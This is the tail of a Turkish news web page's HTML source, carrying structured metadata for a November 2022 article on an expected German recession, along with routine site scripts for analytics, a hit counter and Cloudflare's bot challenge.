        <input type="hidden" name="m" value="arama">
        <input name="q" type="search" class="form-control form-control-lg" placeholder="Sitede aramak için bir kelime yazın ve Enter'a basın." required>
        <input type="hidden" name="auth" value="4f298b37a6a25d0fe0592dd8a060cec45bcd66d4" />
      </div>
      <div class="col-2"><button type="submit" class="btn btn-primary btn-block btn-lg text-uppercase">Ara</button></div>
    </div>
        <div class="text-center my-3">
              <a href="https://www.dunyabulteni.net/haberleri/k%C4%B1rg%C4%B1zistan" title="kırgızistan" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#kırgızistan</a>
              <a href="https://www.dunyabulteni.net/haberleri/3" title="3" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#3</a>
              <a href="https://www.dunyabulteni.net/haberleri/bask%C4%B1n" title="baskın" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#baskın</a>
              <a href="https://www.dunyabulteni.net/haberleri/msb" title="msb" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#msb</a>
              <a href="https://www.dunyabulteni.net/haberleri/Beyrut" title="Beyrut" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Beyrut</a>
              <a href="https://www.dunyabulteni.net/haberleri/Bel%C3%A7ika" title="Belçika" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Belçika</a>
              <a href="https://www.dunyabulteni.net/haberleri/15+Temmuz+darbe+giri%C5%9Fimi" title="15 Temmuz darbe girişimi" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#15 Temmuz darbe girişimi</a>
              <a href="https://www.dunyabulteni.net/haberleri/putin" title="putin" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#putin</a>
              <a href="https://www.dunyabulteni.net/haberleri/salg%C4%B1n" title="salgın" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#salgın</a>
              <a href="https://www.dunyabulteni.net/haberleri/h%C4%B1rvatistan" title="hırvatistan" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#hırvatistan</a>
              <a href="https://www.dunyabulteni.net/haberleri/Mursi" title="Mursi" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Mursi</a>
              <a href="https://www.dunyabulteni.net/haberleri/a%C5%9F%C4%B1" title="aşı" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#aşı</a>
              <a href="https://www.dunyabulteni.net/haberleri/Mahmud+Abbas" title="Mahmud Abbas" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Mahmud Abbas</a>
              <a href="https://www.dunyabulteni.net/haberleri/Missouri" title="Missouri" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Missouri</a>
              <a href="https://www.dunyabulteni.net/haberleri/libya+eylem" title="libya eylem" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#libya eylem</a>
              <a href="https://www.dunyabulteni.net/haberleri/turizm" title="turizm" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#turizm</a>
              <a href="https://www.dunyabulteni.net/haberleri/Bank+Asya" title="Bank Asya" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Bank Asya</a>
              <a href="https://www.dunyabulteni.net/haberleri/bar%C4%B1%C5%9F+p%C4%B1nar%C4%B1+harekat%C4%B1" title="barış pınarı harekatı" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#barış pınarı harekatı</a>
              <a href="https://www.dunyabulteni.net/haberleri/Danimarka" title="Danimarka" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Danimarka</a>
              <a href="https://www.dunyabulteni.net/haberleri/Kovid-19" title="Kovid-19" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Kovid-19</a>
          </div>
      </form>
</div>
    <div class="alert text-center cookiealert" role="alert">
    En iyi site deneyimi sağlamak için çerezlerden faydalanıyoruz. Sitemizi kullanmaya devam etmeniz gizlilik politikamızı kabul ettiğiniz anlamına gelmektedir.    <a class="text-white" href="https://www.dunyabulteni.net/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" target="_blank">Detaylar</a>
    <button type="button" class="btn btn-info btn-sm acceptcookies" aria-label="Kapat">
        Tamam    </button>
</div>



<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="application/ld+json">
    {
    "@context": "http:\/\/schema.org",
    "@type": "Organization",
    "url": "https:\/\/www.dunyabulteni.net\/",
    "contactPoint": {
        "@type": "ContactPoint",
        "contactType": "customer service",
        "telephone": "+90 0216 339 45 45"
    },
    "logo": {
        "@type": "ImageObject",
        "url": "https:\/\/www.dunyabulteni.net\/images\/banner\/dunyabulteni_1_1_1.png",
        "width": 191,
        "height": 92
    }
}</script>
<script type="application/ld+json">
    {
    "@context": "http:\/\/schema.org",
    "@type": "WebSite",
    "url": "https:\/\/www.dunyabulteni.net\/",
    "potentialAction": {
        "@type": "SearchAction",
        "target": "https:\/\/www.dunyabulteni.net\/haberleri\/{search_term_string}",
        "query-input": "required name=search_term_string"
    }
}</script>
<script type="application/ld+json">
    {
    "@context": "http:\/\/schema.org",
    "@type": "NewsArticle",
    "articleSection": "Headlines",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https:\/\/www.dunyabulteni.net\/avrupa\/almanya-da-resesyon-bekleniyor-h545829.html"
    },
    "headline": "Almanya&#039;da resesyon bekleniyor",
    "name": "Almanya&#039;da resesyon bekleniyor",
    "articleBody": "Alman h\u00fck\u00fcmetinin maliye politikas\u0131n\u0131 belirlemede rehberlik eden be\u015f ki\u015filik kurul raporunda, bu y\u0131l ekonominin y\u00fczde 1,7 b\u00fcy\u00fcmesini bekledi\u011fini bildirirken, gelecek y\u0131l enerji krizi nedeniyle y\u00fczde 0,2'lik daralma \u00f6ng\u00f6r\u00fcs\u00fcnde bulundu\n\nEnerji krizi ve y\u00fcksek enflasyonun haneler ve \u015firketler \u00fczerinde a\u011f\u0131r bir bask\u0131 olu\u015fturdu\u011funa yer verilen raporda, enerji ve g\u0131da fiyatlar\u0131nda devam eden keskin art\u0131\u015f\u0131n sat\u0131n alma g\u00fcc\u00fc kayb\u0131na ve \u00f6zel t\u00fcketimin azalmas\u0131na neden oldu\u011fu vurguland\u0131.\n\nSVR, m\u00fcmk\u00fcn oldu\u011funca y\u00fcksek enerji fiyatlar\u0131na kar\u015f\u0131 hanelere ve \u015firketlere yard\u0131m sa\u011flanmas\u0131 gerekti\u011fine dikkati \u00e7ekiyor.\n\nEnerji krizinin \u00f6zellikle enerji yo\u011fun sanayi kollar\u0131nda \u00fcretimi olumsuz etkiledi\u011fini belirten kurul, k\u00fcresel ekonomideki yava\u015flaman\u0131n Alman mallar\u0131na olan talebi zay\u0131flatt\u0131\u011f\u0131n\u0131 ifade etti.\n\nKaynak: Euronews\n",
    "description": "Almanya&#039;da resesyon bekleniyor  ile ilgili haber",
    "keywords": "Almanya, resesyon",
    "image": {
        "@type": "ImageObject",
        "url": "https:\/\/www.dunyabulteni.net\/images\/haberler\/2022\/11\/almanya_da_resesyon_bekleniyor_h545829_2f565.JPG",
        "width": 696,
        "height": 363
    },
    "datePublished": "2022-11-10T17:21:39+03:00",
    "dateModified": "2022-11-10T17:21:39+03:00",
    "genre": "news",
    "wordCount": 162,
    "inLanguage": "tr-TR",
    "author": {
        "@type": "Organization",
        "name": "D\u00fcnya B\u00fclteni"
    },
    "publisher": {
        "@type": "Organization",
        "name": "D\u00fcnya B\u00fclteni",
        "logo": {
            "@type": "ImageObject",
            "url": "https:\/\/www.dunyabulteni.net\/images\/banner\/dunyabulteni_1_1_1.png",
            "width": 191,
            "height": 60
        }
    }
}</script>
<script>
var ELEGANT = {"settings":{"theme_path":"https:\/\/www.dunyabulteni.net\/_themes\/hs-elegant\/","ajax_url":"_ajax\/","site_url":"https:\/\/www.dunyabulteni.net\/","theme":"hs-elegant","analytics":"UA-127080391-1","comment_approved":0,"theme_version":"1.0.5","system_version":"5.15","popup_time":"1","language":"tr","module":"haber","save":true,"follow":false,"id":545829,"category":false}},
    $infinityContainer, _lang = {"unauthorized":"Bu i\u015flemi yapabilmek i\u00e7in \u00fcye giri\u015fi yapmal\u0131s\u0131n\u0131z!","new_notification":"Yeni bildirimleriniz var!","unsave":"Kaydedildi","save":"Kaydet","not_saved_items":"Hen\u00fcz kaydedilmi\u015f bir haber bulunmuyor!","sure_saved_delete":"\u0130\u00e7erik kay\u0131t listesinden \u00e7\u0131kar\u0131ls\u0131n m\u0131?","sure_unfollow":":string takip listesinden \u00e7\u0131kar\u0131ls\u0131n m\u0131?","follow":"Takip Et","unfollow":"Takip ediyorsunuz","password_length":"Yeni parolan\u0131z en az 6 haneli olmal\u0131d\u0131r!","delete":"Sil","read_more":"Devam\u0131n\u0131 oku","close":"Kapat","max_image_error":"En fazla 8 resim ekleyebilirsiniz!","comment_polled":"Daha \u00f6nce bu yorumu oylad\u0131n\u0131z!","email_required":"Ge\u00e7erli bir E-posta adresi girmelisiniz!","email_invalid":"Ge\u00e7erli bir E-posta adresi girmelisiniz!","email_saved":"E-posta adresiniz b\u00fclten listesine eklenmi\u015ftir!","duplicate_email":"E-posta adresi zaten kay\u0131tl\u0131!","yes":"Evet","cancel":"Vazge\u00e7"};
</script>
<script src="https://www.dunyabulteni.net/_themes/hs-elegant/script/bundle.min.js?v=1.1"></script>
<script>
function tebilisim(id, module, page, count_format) {
    $.get(ELEGANT.settings.site_url + '_ajax/tebilisim.php?id=' + id + '&m=' + module + '&page=' + page +
        '&count_format=k',
        function(hit) {
            $(".hitCounter-" + id).html(hit);
        });
}
tebilisim('545829', 'haber',
    '');
</script>
<script>
$(document).ready(function() {
    if($('#title-bar').length > 0) { 
        if($('#left-ad').length > 0) {
            $('#left-ad').css('top',$('#left-ad')[0].offsetTop + 38 + 'px'); 
        } 
        if($('#right-ad').length > 0) {
            $('#right-ad').css('top',$('#right-ad')[0].offsetTop + 38 + 'px'); 
        }
    }
    $('#userAccount a[data-toggle="tab"]').on('show.bs.tab', function(e) {
        localStorage.setItem('activeTab', $(e.target).attr('href'));
    });
    var activeTab = localStorage.getItem('activeTab');
    if (activeTab) {
        $('#userAccount a[href="' + activeTab + '"]').tab('show');
    }
});
</script>
<script>
    $(document).ready(function(){
        if(getCookie('panelshow')=="show"){
            $("#panel-bar").removeClass('d-none');
        }else{
            $("#panel-bar").remove();
        }
    });
</script>




<script>
if ($infinityContainer) {
    $infinityContainer.on('history.infiniteScroll', function(event, title, path) {
        gtag('config', ELEGANT.settings.analytics, {
            'page_path': window.location.pathname
        });
    });
}
</script>







<script>
$("#onbellek_temizle").click(function() {
    $.ajax({
        type: "GET",
        dataType: "html",
        url: "https://www.dunyabulteni.net/xpanel/includes/editable.php?type=clear_cache",
        success: function(msg) {
            toastr.success("Önbellek Temizlendi");
        }
    });
});

$('#logout').click(function(e) {
    $.get("https://www.dunyabulteni.net/xpanel/index.php?logout").then(function() {
        location.reload();
    })
});

$('#refresh_page').click(function(e) {
    location.reload();
});
</script>

<amp-analytics type="alexametrics">
<script type="application/json"> {"vars": { "atrk_acct": "qgO0r1uhUo20dG", "domain": "dunyabulteni.net" }}</script>
</amp-analytics>
<!-- End Alexa AMP Certify Javascript -->

<script async custom-element="amp-analytics" src="https://cdn.ampproject.org/v0/amp-analytics-0.1.js"></script>





<script>(function(){var js = "window['__CF$cv$params']={r:'767f7bd68bd9821a',m:'ee7lEqiOl_wj8ZaIGEiNfTiMHoA4wRYXqNHjzQdGDIE-1668090602-0-ARrD9JbvjnFpddMVerp66uDDMzAleVK/ChtfYnTQE3bn2aXDPs/FbQZBPnZU2cREd8viUxpPR/R0cbF/wLAfBiiq2B9wpTCvS5C/7e7DiAvQ3CXUfAzWqMwGp3Xc9SX4oIqmRTDr6zhhJHeEkKXunYiZRw2Pl3fyBdurWmwc7JXF6/ceSJZHXREp8KzOjBBZ7A==',s:[0xa0b5ca556d,0x337db11325],u:'/cdn-cgi/challenge-platform/h/b'};var now=Date.now()/1000,offset=14400,ts=''+(Math.floor(now)-Math.floor(now%offset)),_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/h/b/scripts/alpha/invisible.js?ts='+ts,document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border = 'none';_0xh.style.visibility = 'hidden';document.body.appendChild(_0xh);function handler() {var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;if (_0xi) {var _0xj = _0xi.createElement('script');_0xj.nonce = '';_0xj.innerHTML = js;_0xi.getElementsByTagName('head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document.onreadystatechange || function () {};document.onreadystatechange = function (e) {prev(e);if (document.readyState !== 'loading') {document.onreadystatechange = prev;handler();}};}})();</script></body>

</html>
